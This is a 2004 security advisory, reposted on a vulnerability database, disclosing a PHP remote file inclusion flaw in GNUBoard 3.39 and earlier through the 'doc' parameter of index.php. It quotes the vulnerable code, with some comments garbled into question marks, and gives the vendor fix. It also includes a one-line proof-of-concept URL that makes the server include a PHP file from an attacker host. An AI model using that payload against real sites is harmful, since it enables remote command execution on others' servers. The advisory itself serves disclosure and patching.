STG Security Advisory: [SSA-20041214-14] GNUBoard PHP injection vulnerability

2004-12-16T00:00:00
ID SECURITYVULNS:DOC:7347
Type securityvulns
Reporter Securityvulns
Modified 2004-12-16T00:00:00

Description

STG Security Advisory: [SSA-20041214-14] GNUBoard PHP injection vulnerability

Revision 1.0 Date Published: 2004-12-14 (KST) Last Update: 2004-12-14 Disclosed by SSR Team (advisory@stgsecurity.com)

Summary

GNUBoard is one of widely used web BBS applications in Korea. Because of an input validation flaw, a malicious attack can run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user.

Vulnerability Class

Implementation Error: Input validation flaw

Impact

High : arbitrary command execution.

Affected Products

GNUBoard 3.39 and prior versions php.ini : register_globals = On

Vendor Status: FIXED

2004-12-06 Vulnerability found. 2004-12-06 GNUBoard developer notified. 2004-12-06 GNUBoard 3.40 is released. 2004-12-14 Official release.

Details

For improper verification of input value of the parameter, the "doc" parameter in "index.php" can be exploited to include arbitrary files of external or local resources to execute arbitary commands.

index.php


if (!$doc) { (1) <-- check point $doc = './main.php'; }

// php ??? ??? ??? ? ?? $tmp = explode(".", $doc); $extension = $tmp[count($tmp)-1]; if (!preg_match("/^(php[3]?|[p]?htm[l]?)$/i", $extension) || count($tmp)<=1) { echo "php php3 htm html phtml ??? ??? ? ????."; exit; } ...... ob_start(); include $doc; (2) <-- include point


Proof of concept : http://[victim]/gnu3/index.php?doc=http://[attacker]/[attack].php

Solution

Update to 3.40 http://sir.co.kr/?doc=bbs/gnuboard.php&bo_table=pds&page=1&wr_id=1871

Vendor URL

http://www.sir.co.kr/

Credits

Jeremy Bae at STG Security